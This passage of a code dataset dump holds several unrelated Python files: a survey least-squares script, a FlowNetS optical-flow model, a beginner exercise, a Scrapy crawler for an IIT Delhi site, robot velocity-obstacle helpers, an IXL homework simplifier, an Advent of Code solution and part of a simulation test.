distance\n row[0], row[1] = y, x\n A = numpy.vstack([A, row])\n observed = distance\n calculated = get_distance(observation.to_point, observation.from_point)\n oc = observed - calculated\n l = numpy.vstack([l, oc])\n\nX = ((A.T) * P * A).I * (A.T) * P * l\nV = (A * X) - l\nAtPA = A.T * P * A\nAtPL = A.T * P * l\nvariance_factor = (V.T * V) / (n - (2 + number_of_set_ups) )\nsigma_X = float(variance_factor) * (AtPA).I\nsigma_L = float(variance_factor) * A * (AtPA).I * A.T\n\nfprint (str(sigma_X), 'sigma_x.txt')\nfprint (str(sigma_L), 'sigma_l.txt')\nfprint (str(A), 'A.txt')\nfprint (str(V), 'V.txt')\nfprint (str(l), 'l.txt')\nfprint (str(variance_factor), 'variance_factor.txt')\nfprint (str(X), 'X.txt')\n","repo_name":"jasrusable/APG2014S_LSA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43558389441","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\n\nimport math\nimport numpy as np\n\ndef conv(batchNorm, in_planes, out_planes, kernel_size=3, stride=1):\n if batchNorm:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.LeakyReLU(0.1,inplace=True)\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=True),\n nn.LeakyReLU(0.1,inplace=True)\n )\n\ndef i_conv(batchNorm, in_planes, out_planes, kernel_size=3, stride=1, bias = True):\n if batchNorm:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=bias),\n nn.BatchNorm2d(out_planes),\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=bias),\n )\n\ndef predict_flow(in_planes):\n return nn.Conv2d(in_planes,2,kernel_size=3,stride=1,padding=1,bias=True)\n\ndef deconv(in_planes, out_planes):\n return nn.Sequential(\n nn.ConvTranspose2d(in_planes, out_planes, kernel_size=4, stride=2, padding=1, bias=True),\n nn.LeakyReLU(0.1,inplace=True)\n )\n\nclass tofp16(nn.Module):\n def __init__(self):\n super(tofp16, self).__init__()\n\n def forward(self, input):\n return input.half()\n\n\nclass tofp32(nn.Module):\n def __init__(self):\n super(tofp32, self).__init__()\n\n def forward(self, input):\n return input.float()\n\n\ndef init_deconv_bilinear(weight):\n f_shape = weight.size()\n heigh, width = f_shape[-2], f_shape[-1]\n f = np.ceil(width/2.0)\n c = (2 * f - 1 - f % 2) / (2.0 * f)\n bilinear = np.zeros([heigh, width])\n for x in range(width):\n for y in range(heigh):\n value = (1 - abs(x / f - c)) * (1 - abs(y / f - c))\n bilinear[x, y] = value\n weight.data.fill_(0.)\n for i in range(f_shape[0]):\n for j in range(f_shape[1]):\n weight.data[i,j,:,:] = torch.from_numpy(bilinear)\n\n\ndef save_grad(grads, name):\n def hook(grad):\n grads[name] = grad\n return hook\n'Parameter count : 38,676,504 '\n\nclass FlowNetS(nn.Module):\n def __init__(self, args, input_channels = 12, batchNorm=True):\n super(FlowNetS,self).__init__()\n\n self.batchNorm = batchNorm\n self.conv1 = conv(self.batchNorm, input_channels, 64, kernel_size=7, stride=2)\n self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)\n self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)\n self.conv3_1 = conv(self.batchNorm, 256, 256)\n self.conv4 = conv(self.batchNorm, 256, 512, stride=2)\n self.conv4_1 = conv(self.batchNorm, 512, 512)\n self.conv5 = conv(self.batchNorm, 512, 512, stride=2)\n self.conv5_1 = conv(self.batchNorm, 512, 512)\n self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)\n self.conv6_1 = conv(self.batchNorm,1024, 1024)\n\n self.deconv5 = deconv(1024,512)\n self.deconv4 = deconv(1026,256)\n self.deconv3 = deconv(770,128)\n self.deconv2 = deconv(386,64)\n\n self.predict_flow6 = predict_flow(1024)\n self.predict_flow5 = predict_flow(1026)\n self.predict_flow4 = predict_flow(770)\n self.predict_flow3 = predict_flow(386)\n self.predict_flow2 = predict_flow(194)\n\n self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n if m.bias is not None:\n init.uniform_(m.bias)\n init.xavier_uniform_(m.weight)\n\n if isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n init.uniform_(m.bias)\n init.xavier_uniform_(m.weight)\n # init_deconv_bilinear(m.weight)\n self.upsample1 = nn.Upsample(scale_factor=4, mode='bilinear')\n\n def forward(self, x):\n out_conv1 = self.conv1(x)\n\n out_conv2 = self.conv2(out_conv1)\n out_conv3 = self.conv3_1(self.conv3(out_conv2))\n out_conv4 = self.conv4_1(self.conv4(out_conv3))\n out_conv5 = self.conv5_1(self.conv5(out_conv4))\n out_conv6 = self.conv6_1(self.conv6(out_conv5))\n\n flow6 = self.predict_flow6(out_conv6)\n flow6_up = self.upsampled_flow6_to_5(flow6)\n out_deconv5 = self.deconv5(out_conv6)\n \n concat5 = torch.cat((out_conv5,out_deconv5,flow6_up),1)\n flow5 = self.predict_flow5(concat5)\n flow5_up = self.upsampled_flow5_to_4(flow5)\n out_deconv4 = self.deconv4(concat5)\n \n concat4 = torch.cat((out_conv4,out_deconv4,flow5_up),1)\n flow4 = self.predict_flow4(concat4)\n flow4_up = self.upsampled_flow4_to_3(flow4)\n out_deconv3 = self.deconv3(concat4)\n \n concat3 = torch.cat((out_conv3,out_deconv3,flow4_up),1)\n flow3 = self.predict_flow3(concat3)\n flow3_up = self.upsampled_flow3_to_2(flow3)\n out_deconv2 = self.deconv2(concat3)\n\n concat2 = torch.cat((out_conv2,out_deconv2,flow3_up),1)\n flow2 = self.predict_flow2(concat2)\n\n if self.training:\n return flow2,flow3,flow4,flow5,flow6\n else:\n return flow2,\n\nclass FlowNet2S(FlowNetS):\n def __init__(self, args, batchNorm=False, div_flow=20):\n super(FlowNet2S,self).__init__(args, input_channels = 6, batchNorm=batchNorm)\n self.rgb_max = args['rgb_max']\n self.div_flow = div_flow\n \n def forward(self, inputs):\n rgb_mean = inputs.contiguous().view(inputs.size()[:2]+(-1,)).mean(dim=-1).view(inputs.size()[:2] + (1,1,1,))\n x = (inputs - rgb_mean) / self.rgb_max\n x = torch.cat( (x[:,:,0,:,:], x[:,:,1,:,:]), dim = 1)\n\n out_conv1 = self.conv1(x)\n\n out_conv2 = self.conv2(out_conv1)\n out_conv3 = self.conv3_1(self.conv3(out_conv2))\n out_conv4 = self.conv4_1(self.conv4(out_conv3))\n out_conv5 = self.conv5_1(self.conv5(out_conv4))\n out_conv6 = self.conv6_1(self.conv6(out_conv5))\n\n flow6 = self.predict_flow6(out_conv6)\n flow6_up = self.upsampled_flow6_to_5(flow6)\n out_deconv5 = self.deconv5(out_conv6)\n \n concat5 = torch.cat((out_conv5,out_deconv5,flow6_up),1)\n flow5 = self.predict_flow5(concat5)\n flow5_up = self.upsampled_flow5_to_4(flow5)\n out_deconv4 = self.deconv4(concat5)\n \n concat4 = torch.cat((out_conv4,out_deconv4,flow5_up),1)\n flow4 = self.predict_flow4(concat4)\n flow4_up = self.upsampled_flow4_to_3(flow4)\n out_deconv3 = self.deconv3(concat4)\n \n concat3 = torch.cat((out_conv3,out_deconv3,flow4_up),1)\n flow3 = self.predict_flow3(concat3)\n flow3_up = self.upsampled_flow3_to_2(flow3)\n out_deconv2 = self.deconv2(concat3)\n\n concat2 = torch.cat((out_conv2,out_deconv2,flow3_up),1)\n flow2 = self.predict_flow2(concat2)\n\n if self.training:\n return flow2,flow3,flow4,flow5,flow6\n else:\n return self.upsample1(flow2*self.div_flow)","repo_name":"GuardSkill/NAN_pytorch","sub_path":"flownetS.py","file_name":"flownetS.py","file_ext":"py","file_size_in_byte":7718,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"9947455377","text":" ###############################\n # #\n # Exercise 6 #\n # www.w3resource.com #\n ###############################\n\n# Write a Python program which accepts a sequence of comma-separated numbers from user and generate a list and a tuple\n# with those numbers.\n\n# Sample data : 3, 5, 7, 23\n# Output :\n# List : ['3', ' 5', ' 7', ' 23']\n# Tuple : ('3', ' 5', ' 7', ' 23')\n\nstring = input(\"Enter your numbers separated by commas : \")\nlist = []\nfor num in string:\n if num != \",\":\n list.append(num)\n\ntuple = tuple(list)\n\nprint('List : ',list)\nprint('Tuple : ',tuple)\n\n# Also we can use\n# list = string.slpit(\",\")\n\n# str.split(sep=None, maxsplit=-1)\n#Return a list of the words in the string, using sep as the delimiter string. If maxsplit is given, at most maxsplit\n#splits are done (thus, the list will have at most maxsplit+1 elements). If maxsplit is not specified or -1, then there\n#is no limit on the number of splits (all possible splits are made).\n\n","repo_name":"euggrie/w3resources_python_exercises","sub_path":"Basic/exercise6.py","file_name":"exercise6.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"10550752352","text":"import datetime\nfrom scrapy import signals\nfrom scrapy.http import Request, Response\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom pymongo.collection import Collection, ReturnDocument\nfrom crawling__iitd.seeder import Seeder\nfrom crawling__iitd.mongo_creator import getMongoCollection\n\nclass IITDSpider(CrawlSpider):\n name = \"iitd\"\n\n allowed_domains = [\n 'iitd.ac.in',\n 'iitd.ernet.in'\n ]\n\n rules = [\n Rule(LinkExtractor(), follow=True, callback=\"parse_item\",process_request=\"process_request\")\n ]\n\n start_urls = [\n 'https://home.iitd.ac.in/',\n ]\n\n #start_request generates request for all links\n def start_requests(self):\n self.mongo_collection: Collection = getMongoCollection()\n for url in self.start_urls:\n doc = self.mongo_collection.find_one_and_update({\"url\": url}, {\"$setOnInsert\": {\n \"crawl_details\": {},\n \"scraped\": False}\n }, upsert=True, return_document=ReturnDocument.AFTER)\n \n #seeder returns the crawl_info collection...so that Request could be yielded for priviosly crawled links(doc).\n #initially crawl_info does not contain any data ...\n for doc in Seeder(self.mongo_collection).seed():\n url = doc['url']\n self.logger.info(f\"Got {url} from seeder\")\n yield Request(url, meta={\"mongo_doc\": doc})\n\n\n def process_request(self, request: Request, response: Response):\n self.logger.debug('Processing request')\n \n #newly visited links would not have mongo_doc in request.meta....so saving them in crawl_info ...once saved ...Request would be created for them and hence mongo_doc will then be present in request.meta\n if \"mongo_doc\" not in request.meta:\n request.meta[\"mongo_doc\"] = self.mongo_collection.find_one_and_update({\"url\": request.url},{\"$setOnInsert\": {\n \"crawl_details\": {},\n \"scraped\": False}\n },upsert=True,return_document=ReturnDocument.AFTER)\n\n #Drop this request if it has already been crawled\n # if len(request.meta[\"mongo_doc\"][\"crawl_details\"]) != 0:\n if request.meta[\"mongo_doc\"][\"scraped\"]!=False:\n return None\n \n return request\n \n # def parse_item(self, response):\n # self.logger.info('Hello World Checking this function')\n # item = {\n # \"request\": response.request,\n # \"elastic_doc\": {\n # 'url': response.url,\n # 'status': response.status,\n # 'title': response.xpath(\"//title\").get(),\n # 'body': response.xpath(\"//body\").get(),\n # 'link_text': response.meta['link_text'],\n # },\n # }\n\n # return item\n\n def parse_item(self,response) :\n if response.status==200:\n self.logger.info(f'Scraping Page with url {response.url}')\n body=self.extract_body(response)\n\n links=response.css('a')\n links_url=links.css('::attr(href)').extract()\n links_text=links.css('::text').extract()\n remove='\\n \\t \\f \\r \\b'\n for text in links_text:\n text=text.lstrip(remove)\n text=text.rstrip(remove)\n\n item = {\n \"url\":response.url, \n \"status\":response.status,\n \"title\":response.css('title::text').get(),\n \"meta_data\":response.css('meta').extract(),\n \"body\":body,\n \"crawled_on\":datetime.datetime.now(),\n \"links_url\":links_url,\n \"links_text\":links_text,\n }\n # doc = self.mongo_collection.find_one_and_update({\"url\": response.url},{\"$setOnInsert\": {\"crawl_details\": item,\"crawled_on\": datetime.datetime.now()}},upsert=True,return_document=ReturnDocument.AFTER)\n myquery = { 'url': response.url }\n newvalues = { \"$set\": { 'crawl_details' : item, 'scraped':True } }\n self.mongo_collection.update_one(myquery, newvalues)\n \n yield item \n else:\n yield None\n\n def extract_body(self,response):\n # all text data in heading, para, a, b tags is extracted\n body=[]\n # cheking for paragraphs\n paras=response.css('p::text').extract()\n for str in paras :\n if(self.check_string(str)==-1):\n paras.remove(str)\n body+=paras\n\n # checking for headings

\n headings=response.css('h2::text').extract()\n for str in headings:\n if(self.check_string(str)==-1):\n headings.remove(str)\n body+=headings\n \n # checking for bolds tags\n bolds=response.css('b::text').extract()\n for str in bolds:\n if(self.check_string(str)==-1):\n bolds.remove(str)\n body+=bolds\n\n # checking for all headings\n headings1=response.css('h1::text').extract()\n for str in headings1:\n if(self.check_string(str)==-1):\n headings1.remove(str)\n body+=headings1\n\n headings3=response.css('h3::text').extract()\n for str in headings3:\n if(self.check_string(str)==-1):\n headings3.remove(str)\n body+=headings3\n\n headings4=response.css('h4::text').extract()\n for str in headings4:\n if(self.check_string(str)==-1):\n headings4.remove(str)\n body+=headings4\n\n headings5=response.css('h5::text').extract()\n for str in headings5:\n if(self.check_string(str)==-1):\n headings5.remove(str)\n body+=headings5\n\n # checking for link texts\n links=response.css('a::text').extract()\n for str in links:\n if(self.check_string(str)==-1):\n links.remove(str)\n body+=links\n\n\n return body\n\n def check_string(self,str):\n remove=\"\\n \\t \\f \\r \\b \"\n str=str.lstrip(remove)\n str=str.rstrip(remove)\n if(len(str)<=2):\n return -1\n else:\n return 1\n","repo_name":"prahasR/IITD_SearchEngine","sub_path":"crawling__iitd/crawling__iitd/spiders/spidey.py","file_name":"spidey.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"86557134004","text":"# imports\nimport math\nfrom math import cos, sin, atan2, radians, degrees, sqrt, hypot\nimport random\nimport time\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.patches import Circle, Wedge, Polygon\n\n# Circle class\nclass Circle:\n\tdef __init__(self, loc, rad):\n\t\tself.x = loc[0]\n\t\tself.y = loc[1]\n\t\tself.r = rad\n\n\ndef plotRect(rectLists, ax):\n\tfor rectList in rectLists:\n\t\tx = rectList[0]\n\t\ty = rectList[1]\n\t\tw = rectList[2]\n\t\th = rectList[3]\n\t\trect = plt.Rectangle((x,y),w,h,alpha=.7, color = (0.5,0.5,0.5))\n\t\tax.add_artist(rect)\n\ndef check_vert(x,y, r, rect):\n\trect_x = rect[0]\n\trect_y = rect[1]\n\tw,h = rect[2], rect[3]\n\td1,_ = distance((rect_x,rect_y), (x,y))\n\td2,_ = distance((rect_x + w, rect_y), (x,y))\n\td3,_ = distance((rect_x, rect_y + h), (x,y))\n\td4,_ = distance((rect_x + w, rect_y + h), (x,y))\n\n\tif d1 <= r or d2 <= r or d3 <= r or d4 <= r:\n\t\treturn True\n\n\treturn False\n\ndef no_collision(px,py,rad,point_lists=[]):\n\t# rad = 70\n\tfor point_list in point_lists:\n\t\tx = point_list[0] #Rectangle bottom left x\n\t\ty = point_list[1] #Rectangle bottom left y\n\t\tw = point_list[2] #Rectangle width\n\t\th = point_list[3] #Rectangle height\n\n\t\tnew_x = x - rad\n\t\tnew_y = y - rad\n\t\tw = rad * 2 + w\n\t\th = rad * 2 + h\n\n\t\tif (px >= new_x and px <= new_x + w) and ( py >= new_y and py <= new_y + h ):\n\t\t\treturn False\n\treturn True\n\n# Distance between 2 points\ndef distance(loc1, loc2):\n\tx1,y1 = loc1\n\tx2,y2 = loc2\n\n\tprint(\"loc1:\", x1,y1)\n\tprint(\"loc2:\", x2,y2)\n\tx_dis = x2 - x1\n\ty_dis = y2 - y1\n\n\tprint(\"x_dis\", x_dis, \"y_dis\", y_dis)\n\n\ttheta = atan2(y_dis, x_dis) \n\tmag = sqrt(x_dis**2 + y_dis**2)\n\tprint(\"magnitude of dist\",mag)\n\n\treturn mag,theta\n\ndef circ_intersection(circ1, circ2):\n\tprint(\"Circle 1 info\", circ1.r, circ1.x, circ1.y)\n\tprint(\"Circle 2 info\", circ2.r, circ2.x, circ2.y)\n\tdis = hypot(circ2.x - circ1.x, circ2.y - circ1.y)\n\n\te_x = (circ2.x - circ1.x) / dis\n\te_y = (circ2.y - circ1.y) / dis\n\n\tx = (circ1.r * circ1.r - circ2.r * circ2.r + dis * dis) / (2 * dis)\n\ty = sqrt(circ1.r * circ1.r - x * x)\n\n\tp1 = (circ1.x + x * e_x - y * e_y, circ1.y + x * e_y + y * e_x)\n\tp2 = (circ1.x + x * e_x + y * e_y, circ1.y + x * e_y - y * e_x )\n\n\treturn p1,p2\n\ndef dot_prod(vector1, vector2):\n\tpass\n\ndef integrate(loc, velocity, timestep = 1):\n\tmag, theta = velocity\n\tx,y = loc\n\tx_speed = mag * cos(theta)\n\ty_speed = mag * sin(theta)\n\n\t# print(\"x_speed and y_speed\", x_speed, y_speed)\n\n\tnew_x = x + x_speed * timestep\n\tnew_y = y + y_speed * timestep\n\n\t# print(new_x,new_y)\n\treturn new_x, new_y\n\n\ndef getRVO(robot_a, robot_b):\n\n\talpha = 0.5\n\t# Find the first triangle\n\tA = robot_a.get_loc()\n\tAx, Ay = A\n\n\t# Find the the other 2 points of triangle. \n\t# Find point where tangent line from robot A intersect markovski sun of robotA and robotB\n\tmksvi_radius = robot_b.get_radius() * 2\n\tCx, Cy = robot_b.get_loc()\n\tAO = sqrt((Cx - Ax)**2 + (Cy - Ay)**2)\n\tprint(\"robot_a\", robot_a.get_loc(), \"robot_b\", robot_b.get_loc())\n\tprint(\"Ao\", AO, \"radius\", mksvi_radius)\n\tAP = sqrt((AO**2) - (mksvi_radius**2))\n\n\tP1,P2 = circ_intersection(Circle(robot_b.get_loc(), mksvi_radius),\n\t\tCircle(robot_a.get_loc(), AP))\n\n\t# Translate the points across velocity of a robotB\n\tmag_b, theta_b = robot_b.get_vel()\n\tmag_a, theta_a = robot_a.get_vel()\n\td_x = mag_b * cos(theta_b)\n\td_y = mag_b * sin(theta_b)\n\n\tP1x, P1y = P1\n\tP2x, P2y = P2\n\n\n\t# update triangle points\n\tA_new = Ax + d_x, Ay + d_y\n\tP1_new = P1x + d_x, P1y + d_y\n\tP2_new = P2x + d_x, P2y + d_y\n\n\t# Extend size of triangle\n\tmag, theta = distance (A_new,P1_new)\n\tP1_new = integrate(A_new, (2000, theta))\n\tmag, theta = distance (A_new,P2_new)\n\tP2_new = integrate(A_new, (2000, theta))\n\n\t# update triangle points again\n\n\t# change from VO to RVO\n\tmag_b, theta_b = robot_b.get_vel()\n\tmag_a, theta_a = robot_a.get_vel()\n\txa, ya = cos(theta_a) * alpha * mag_a, sin(theta_a) * alpha * mag_a\n\txb, yb = cos(theta_b) * alpha * mag_b, sin(theta_b) * alpha * mag_b\n\n\tx_sum, y_sum = xa + xb, ya + yb\n\tx_sum_a, y_sum_a = Ax + x_sum, Ay + y_sum\n\tvect_mag, vect_theta = distance(A_new, (x_sum_a, y_sum_a))\n\n\td_x = vect_mag * cos(vect_theta)\n\td_y = vect_mag * sin(vect_theta)\n\t\n\tA_new = A_new[0]+ d_x, A_new[1] + d_y\n\tP1_new = P1_new[0] + d_x, P1_new[1] + d_y\n\tP2_new = P2_new[0] + d_x, P2_new[1] + d_y\n\n\treturn [A_new, P1_new, P2_new]\n\ndef form_roadmap():\n\n\treturn [[(10,-10), (5,-10), (0,-10), (0,12), (-5,12), (-15,15), (-10,-10)],\n\t\t\t[(10,10), (0,0), (-5,0), (-10,0), (-10,10)]]\n\ndef plot_roadmap(ax, road_maps):\n\n\tlines = []\n\n\tfor road_map in road_maps:\n\t\tx = []\n\t\ty = []\n\t\tfor points in road_map:\n\t\t\tx.append(points[0])\n\t\t\ty.append(points[1])\n\n\t\tline, = ax.plot([], [], lw=2)\n\t\tline.set_data([], [])\n\t\tlines.append(line)\n\t\tline.set_data(x, y)\n\ndef line_inter(A,B):\n\ttol = 0.0002\n\tA1x, A1y = A[0]\n\tA2x, A2y = A[1]\n\n\tB1x, B1y = B[0]\n\tB2x, B2y = B[1]\n\n\t# slope\n\tma = (A2y - A1y) / (A2x - A1x) \n\tmb = (B2y - B1y) / (B2x - B1x) \n\n\t# intersecpts\n\tba = A1y - ma * A1x\n\tbb = B1y - mb * B1x\n\n\tprint(\"ma\", ma, mb)\n\tprint(\"ba\", ba, bb)\n\n\t# If lines intersect give a point half way between both lines\n\tif abs(ma - mb) < tol and abs(bb - ba) < tol:\n\t\td, mag = distance(A[0], B[0])\n\t\tmid_point = integrate(A[0], d/2) \n\t\tprint(\"same line\")\n\t\treturn mid_point\n\n\tx = (ba - bb)/ (mb - ma)\n\ty = (ma*bb - mb*ba) / (ma - mb)\n\n\treturn (x,y)\n\n\ndef consequence(vel1, vel2, loc1, loc2):\n\t# if magnitude of velocity is 0 there is no consequence\n\tif vel1[0] == 0 or vel2[0] == 0:\n\t\treturn 0\n\n\tA1 = loc1\n\tA2 = integrate(A1, vel1)\n\n\tB1 = loc2\n\tB2 = integrate(B1, vel2)\n\n\tprint(\"second point A\", A2)\n\tprint(\"second part B\", B2)\n\n\tint_point = line_inter((A1, A2),(B1, B2))\n\n\tif int_point is None: # no intersection\n\t\treturn 0\n\n\t# distance between robot A to int point is the consequence\n\tdist,_ = distance(A1, int_point)\n\treturn dist\n\ndef readPaths(directory):\n\troad_maps = []\n\tfilenames = []\n\n\tprint(directory)\n\n\tfor filename in os.listdir(directory):\n\t # filename = os.fsdecode(file)\n\t\tif filename.endswith(\"txt\"): \n\t\t\tfull_file_name = os.path.join(directory, filename)\n\t\t\tprint(full_file_name)\n\t\t\tfilenames.append(full_file_name)\n\t\telse:\n\t\t\tcontinue\n\n\tfor filename in filenames:\n\t\tlines = [line.rstrip() for line in open(filename) if len(line.rstrip()) > 0]\n\n\t\tif len(lines) == 0:\n\t\t print(\"That files empty\")\n\t\t sys.exit(1)\n\n\t\tcspace = lines[0].strip()\n\t\tif (cspace != 'R2' and cspace != 'SE2' and cspace!= 'Weird'):\n\t\t print (\"Unknown C-space Identifier: \", cspace)\n\t\t sys.exit(1)\n\n\t\tdata = [[float(x) for x in line.split(' ')] for line in lines[1:]]\n\t\troad_maps.append(data)\n\treturn road_maps\n\ndef plotRing(small_r, big_x, big_y, num_circles, big_rad):\n\tphi = 2 * math.pi\n\txvar = 2/num_circles\n\tstart = []\n\t\n\tfor i in range(0,num_circles):\n\t\tx = big_x + (big_rad * math.cos(phi + i * xvar * math.pi )) #x coordinate of small circle\n\t\ty = big_y + (big_rad * math.sin(phi + i * xvar * math.pi )) #y coordinate of small circle\n\t\tstart.append((x,y))\n\n\tnn = int(num_circles / 2)\n\tprint(nn)\n\tfirst_half = start[:nn]\n\tsecond_half = start[nn:]\n\tgoal = second_half + first_half\n\n\treturn start, goal\n\n\ndef inter_point(A,B,C,D):\n\ta1 = B[1] - A[1]\n\tb1 = A[0] - B[0]\n\n\tc1 = a1*A[0] + b1*A[1]\n\n\ta2 = D[1] - C[1]\n\tb2 = C[0] - D[0]\n\tc2 = a2*C[0] + b2*C[1]\n\n\tdeterminant = a1*b2 - a2*b1\n\n\tif (determinant == 0):\n\t\treturn False, (0,0)\n\t\n\tx = (b2*c1 - b1*c2)/determinant\n\ty = (a1*c2 - a2*c1)/determinant\n\n\treturn True, (x,y)\n\ndef get_penalty(robot1_loc, vel1, robot2_loc, vel2):\n\tA = robot1_loc\n\tB = integrate(A,vel1)\n\tC = robot2_loc\n\tD = integrate(C, vel2)\n\n\tcollision, int_point = inter_point(A,B,C,D)\n\tprint(\"A {}, B {}, C {}, D {}\".format(A,B,C,D))\n\tif collision:\n\t\tprint(\"A is {} and int point is {}\".format(A,int_point))\n\t\tdist, theta = distance(A, int_point)\n\n\t\tprint(\"dist is: {}\".format(dist))\n\t\tt = dist/vel1[0]\n\t\tpenalty = 1/t\n\n\t\treturn penalty\n\n\treturn 0\n\n\nif __name__ == \"__main__\":\t\n\t# vel1 = (1,radians(90))\n\t# vel2 = (1, radians(90+180))\n\t# loc1 = (0,0)\n\t# loc2 = (0,2)\n\t# print(\"consequences\", consequence(vel1, vel2, loc1, loc2))\n\t# radius = 2\n\t# big_x, big_y = 0,0\n\t# num_circles = 6\n\t# big_rad = 6\n\t# starts, goals = plotRing(radius, big_x,big_y,num_circles,big_rad)\n\t# print(starts)\n\t# print()\n\t# print(goals)\n\tpen = penalty((0,0),(sqrt(2),radians(45)), (3,1), (sqrt(2),radians(90+45)))\n\tprint(\"Penalty id {}\".format(pen))","repo_name":"Rhemaike/Intro_to_Robotics_submission","sub_path":"funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":8293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18399236224","text":"import readline\nimport mpmath\nfrom .global_functions import copy\nfrom sympy import parse_expr, simplify, Symbol\n\n\ndef introduction():\n print(\"\\nA2.A3 - simplify variable expressions using properties.\\n\")\n print(\"enter the expression.\")\n print(\"the program will return the simplified version of the expression.\")\n print(\"type 'e' to exit.\\n\")\n\n\ndef solve_ixl():\n while True:\n try:\n user_input = input()\n if user_input == \"e\":\n print(\"exiting a2.a3...\\n\")\n break\n\n expression = parse_expr(user_input)\n answer = str(simplify(expression))\n\n print(answer + \"\\n\")\n copy(answer)\n\n except Exception as e:\n print(str(e) + \"\\n\")\n","repo_name":"Fr0stium/ixl_Solver","sub_path":"algebra2/a2_a3.py","file_name":"a2_a3.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"11838444681","text":"#\n# Day 7 of Advent of Code 2022\n#\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\ndef read_input(filename):\n with open(filename, 'r') as f:\n return [line.strip() for line in f.readlines()]\n\ndef parse_input(lines, G):\n # root always exists\n G.add_node('/', labels=True, label='/', files = [])\n cwd = '/'\n for line in lines:\n line = line.split(' ')\n\n if line[0] == '$': # process a command\n listing = False\n if line[1] == 'cd':\n if line[2] == '..':\n # select parent node in G\n # remove last element from cwd excluding the '/'\n cwd = cwd[:cwd.rfind('/')]\n cwd = cwd[:cwd.rfind('/')] + '/'\n\n elif line[2] == '/':\n cwd = '/'\n else:\n cwd = cwd + line[2] + '/'\n elif line[1] == 'ls':\n listing = True\n else:\n # process a listing\n if line[0]=='dir':\n # create a directory if it does not exist\n newdir = cwd + line[1] + '/'\n for n in G.nodes:\n if n == newdir: break # directory already exists\n G.add_node(newdir, labels=True, label=line[1], color='red', files=[])\n G.add_edge(cwd, newdir)\n elif line[0]!='':\n # attach file to current working directory\n files = G.nodes[cwd]['files']\n files.append([line[0], line[1]])\n print(files)\n G.nodes[cwd]['files'] = files\n return\n\ndef dir_size(G, node):\n dir_fs = 0\n\n for f in G.nodes[node]['files']:\n dir_fs += int(f[0])\n\n for subdir in G.successors(node):\n\n dir_fs += dir_size(G, subdir)\n\n return dir_fs\n\n\n\n\ndef main():\n lines = read_input('input.txt')\n G = nx.DiGraph()\n parse_input(lines, G)\n\n total_fs = 0\n for n in G.nodes():\n # print(n)\n # print(G.nodes[n]['files'])\n ds = dir_size(G, n)\n if ds <= 100000: total_fs += ds\n\n print(\"The answer is: \", total_fs)\n\n\n# nx.draw(G, with_labels=True)\n# plt.show()\n\n\n # Part B\n NeededSpace = 30000000\n TotalDiskSpace = 70000000\n\n disk_usage = dir_size(G, '/')\n space_needed = NeededSpace - (TotalDiskSpace - disk_usage)\n dir_options = []\n for n in G.nodes():\n ds = dir_size(G, n)\n if ds >= space_needed:\n dir_options.append(ds)\n\n dir_options.sort()\n print(\"The answer is: \", dir_options[0])\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"bdriessen/AOC2022","sub_path":"Day7/Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33526930143","text":"import sys\nimport os.path\nimport unittest\nsys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), \"..\")))\n\n\nfrom emulica import emulation\nimport logging\nlogger = logging.getLogger('test_sim10')\n\nEXP_RESULT_RESOURCE = [[(0, 0, 'setup'), \n (0, 2, 'load'), \n (7, 7, 'setup'), \n (7, 8, 'unload'), \n (8, 8, 'setup'), \n (8, 10, 'load'), \n (15, 15, 'setup'), \n (15, 16, 'unload'), \n (16, 16, 'setup'), \n (16, 18, 'load'), \n (23, 23, 'setup'), \n (23, 24, 'unload'), \n (24, 24, 'setup'), \n (24, 26, 'load'), \n (31, 31, 'setup'), \n (31, 32, 'unload'), \n (32, 32, 'setup'), \n (32, 34, 'load'), \n (39, 39, 'setup'), \n (39, 40, 'unload'), \n (40, 40, 'setup'), \n (40, 42, 'load'), \n (47, 47, 'setup'), \n (47, 48, 'unload'), \n (48, 48, 'setup'), \n (48, 50, 'load'), \n (55, 55, 'setup'), 